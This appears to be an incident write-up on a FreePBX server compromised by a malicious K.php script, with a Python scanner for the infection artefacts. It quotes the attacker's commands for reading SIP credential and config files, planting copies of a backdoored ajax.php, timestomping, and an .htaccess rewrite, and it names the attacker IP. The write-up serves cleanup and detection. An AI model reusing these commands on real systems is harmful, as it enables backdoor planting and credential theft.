K.php - a RestApps malicious script

Exploit script steals SIP information and configs:

ls -la
ps -aux --forest
asterisk -rx 'core show channels'
asterisk -rx 'sip show peers'
cat /etc/elastix.conf
cat /etc/asterisk/sip_additional.conf
cat /etc/asterisk/extensions_custom.conf
cat /etc/amportal.conf

So after cleanup you need to change all passwords on internal and external SIP accounts.

In my case the exploit modified some ajax.php, config.php and .htaccess files and created its own scripts.
So I deleted them and reinstalled the modules to get the original script versions.

Some exploit modifications:

/var/www/html/admin/views/ajax.php
mkdir -p /var/www/html/digium_phones/
mkdir -p /var/www/html/rest_phones/
cp /var/www/html/admin/views/ajax.php /var/www/html/rest_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/modules/core/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/digium_phones/ajax.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/js/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/config.php
cp /var/www/html/admin/views/ajax.php /var/www/html/admin/assets/ajax.php
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php

/var/www/html/admin/views/.htaccess
RewriteEngine On
# enable symbolic links
Options +FollowSymLinks
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^\s+ config.php [L]

Modified ~/.bashrc and ~/.bash_profile are the reason the command line is inaccessible after login when FreePBX cannot connect to IP 37.49.230.74.

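As an added post-incident check (not from the original post or from FreePBX), a Python script that looks for the artefacts described in the post on a filesystem rooted at a given path: the copied ajax.php/config.php files, the .htaccess rewrite to config.php, the footer.php timestamp copied onto ajax.php, and the quoted IP in the shell rc files. It assumes the login user is root (so the rc files live under /root) and that scan() is run against / or a mounted copy; demo() builds a constructed sample tree to show the output.

```python
import os, re, tempfile

# Paths quoted in the post, relative to the scan root (normally "/").
PLANTED = ["var/www/html/rest_phones/ajax.php", "var/www/html/digium_phones/ajax.php",
           "var/www/html/admin/modules/core/ajax.php", "var/www/html/admin/assets/js/config.php",
           "var/www/html/admin/assets/config.php", "var/www/html/admin/assets/ajax.php"]
HTACCESS = "var/www/html/admin/views/.htaccess"
AJAX = "var/www/html/admin/views/ajax.php"
FOOTER = "var/www/html/admin/views/footer.php"
RC_FILES = ["root/.bashrc", "root/.bash_profile"]  # assumption: the login user is root
C2_IP = "37.49.230.74"  # address quoted in the post

def htaccess_rewrites_to_config(text):
    """True if a RewriteRule sends requests to config.php, as in the post."""
    return re.search(r"^\s*RewriteRule\s+\S+\s+config\.php", text, re.M) is not None

def scan(root="/"):
    """Return a list of findings for the filesystem rooted at `root` (a copy is fine)."""
    j = lambda rel: os.path.join(root, rel)
    findings = ["planted file: /" + rel for rel in PLANTED if os.path.exists(j(rel))]
    if os.path.isfile(j(HTACCESS)) and htaccess_rewrites_to_config(open(j(HTACCESS)).read()):
        findings.append("htaccess rewrite to config.php")
    # `touch ajax.php -r footer.php` copies footer's mtime onto ajax.php; an exact
    # match is the timestomp the post describes (confirm against the package's files).
    if (os.path.isfile(j(AJAX)) and os.path.isfile(j(FOOTER))
            and os.stat(j(AJAX)).st_mtime == os.stat(j(FOOTER)).st_mtime):
        findings.append("ajax.php mtime copied from footer.php")
    for rel in RC_FILES:
        if os.path.isfile(j(rel)) and C2_IP in open(j(rel)).read():
            findings.append("shell rc references " + C2_IP + ": /" + rel)
    return findings

def demo():
    """Constructed sample tree mimicking the infection; returns scan() output."""
    root = tempfile.mkdtemp()
    def put(rel, text):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
        return path
    for path in (put(AJAX, "<?php // backdoored\n"), put(FOOTER, "<?php // footer\n")):
        os.utime(path, (1500000000, 1500000000))  # same effect as touch -r
    put(PLANTED[0], "<?php\n")
    put(HTACCESS, "RewriteEngine On\nOptions +FollowSymLinks\nRewriteRule ^\\s+ config.php [L]\n")
    put(RC_FILES[0], "HOST=" + C2_IP + "\n")  # constructed stand-in for the modified rc
    return scan(root)
```

Run scan("/") on the affected box, or scan("/mnt/image") on a mounted copy; every finding should be checked against a clean module install before trusting the host again.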